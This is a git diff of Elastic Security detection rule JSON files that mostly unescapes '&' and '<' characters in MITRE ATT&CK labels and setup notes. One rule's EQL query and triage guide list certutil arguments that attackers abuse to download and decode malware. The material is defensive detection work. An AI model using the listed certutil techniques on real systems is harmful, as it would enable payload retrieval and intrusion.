b/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_104.json index 5587e1f075d..5851aaf9843 100644 --- a/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_104.json +++ b/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_205.json b/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_205.json index 1cf01e56d9d..3ddbb9a8a0c 100644 --- a/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_205.json +++ b/packages/security_detection_engine/kibana/security_rule/fbd44836-0d69-4004-a0b4-03c20370c435_205.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_103.json b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_103.json index 642c7798393..963204a802d 100644 --- a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_103.json +++ b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_103.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "fc7c0fa4-8f03-4b3e-8336-c5feab0be022", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_104.json b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_104.json index 124ff6068f3..5676ec24ca5 100644 --- a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_104.json +++ b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_104.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "fc7c0fa4-8f03-4b3e-8336-c5feab0be022", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_105.json b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_105.json index 2afbcad5b97..14f3e982ba1 100644 --- a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_105.json +++ b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_105.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "fc7c0fa4-8f03-4b3e-8336-c5feab0be022", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_106.json b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_106.json index 4ed046f6a75..6bd5d3c4047 100644 --- a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_106.json +++ b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_106.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "fc7c0fa4-8f03-4b3e-8336-c5feab0be022", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -116,7 +116,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_107.json b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_107.json index c685abce863..596e6a8b3ee 100644 --- a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_107.json +++ b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_107.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "fc7c0fa4-8f03-4b3e-8336-c5feab0be022", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -115,7 +115,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_104.json b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_104.json index 9c9fe32b9be..89beebeaeb1 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_104.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "fd4a992d-6130-4802-9ff8-829b89ae801f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_105.json b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_105.json index 0bf77294cc8..3047a45c203 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_105.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "fd4a992d-6130-4802-9ff8-829b89ae801f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_106.json b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_106.json index c7687fb2a5e..8ced3c936a6 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_106.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "fd4a992d-6130-4802-9ff8-829b89ae801f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_107.json b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_107.json index 465bb6c20b2..b8b48f5794d 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_107.json @@ -49,7 +49,7 @@ ], "risk_score": 21, "rule_id": "fd4a992d-6130-4802-9ff8-829b89ae801f", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_103.json b/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_103.json index 63929f6096c..1e26896d050 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_103.json +++ b/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_103.json @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "fd70c98a-c410-42dc-a2e3-761c71848acf", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_104.json b/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_104.json index 6e798fc928e..baa0af37154 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_104.json +++ b/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_104.json @@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious CertUtil Commands", - "note": "## Triage and analysis\n\n### Investigating Suspicious CertUtil Commands\n\n`certutil.exe` is a command line utility program that is included with Microsoft Windows operating systems. It is used to manage and manipulate digital certificates and certificate services on computers running Windows.\n\nAttackers can abuse `certutil.exe` utility to download and/or deobfuscate malware, offensive security tools, and certificates from external sources to take the next steps in a compromised environment. This rule identifies command line arguments used to accomplish these behaviors.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine the nature of the execution.\n - If files were downloaded, retrieve them and check whether they were run, and under which security context.\n - If files were obfuscated or deobfuscated, retrieve them.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the involved files using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious CertUtil Commands\n\n`certutil.exe` is a command line utility program that is included with Microsoft Windows operating systems. It is used to manage and manipulate digital certificates and certificate services on computers running Windows.\n\nAttackers can abuse `certutil.exe` utility to download and/or deobfuscate malware, offensive security tools, and certificates from external sources to take the next steps in a compromised environment. This rule identifies command line arguments used to accomplish these behaviors.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine the nature of the execution.\n - If files were downloaded, retrieve them and check whether they were run, and under which security context.\n - If files were obfuscated or deobfuscated, retrieve them.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the involved files using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"certutil.exe\" or process.pe.original_file_name == \"CertUtil.exe\") and\n process.args : (\"?decode\", \"?encode\", \"?urlcache\", \"?verifyctl\", \"?encodehex\", \"?decodehex\", \"?exportPFX\")\n", "references": [ "https://twitter.com/Moriarty_Meng/status/984380793383370752", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_105.json b/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_105.json index 6dff6f76316..5fd0e62f2f9 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_105.json +++ b/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_105.json @@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious CertUtil Commands", - "note": "## Triage and analysis\n\n### Investigating Suspicious CertUtil Commands\n\n`certutil.exe` is a command line utility program that is included with Microsoft Windows operating systems. It is used to manage and manipulate digital certificates and certificate services on computers running Windows.\n\nAttackers can abuse `certutil.exe` utility to download and/or deobfuscate malware, offensive security tools, and certificates from external sources to take the next steps in a compromised environment. This rule identifies command line arguments used to accomplish these behaviors.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine the nature of the execution.\n - If files were downloaded, retrieve them and check whether they were run, and under which security context.\n - If files were obfuscated or deobfuscated, retrieve them.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the involved files using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious CertUtil Commands\n\n`certutil.exe` is a command line utility program that is included with Microsoft Windows operating systems. It is used to manage and manipulate digital certificates and certificate services on computers running Windows.\n\nAttackers can abuse `certutil.exe` utility to download and/or deobfuscate malware, offensive security tools, and certificates from external sources to take the next steps in a compromised environment. This rule identifies command line arguments used to accomplish these behaviors.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine the nature of the execution.\n - If files were downloaded, retrieve them and check whether they were run, and under which security context.\n - If files were obfuscated or deobfuscated, retrieve them.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the involved files using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with 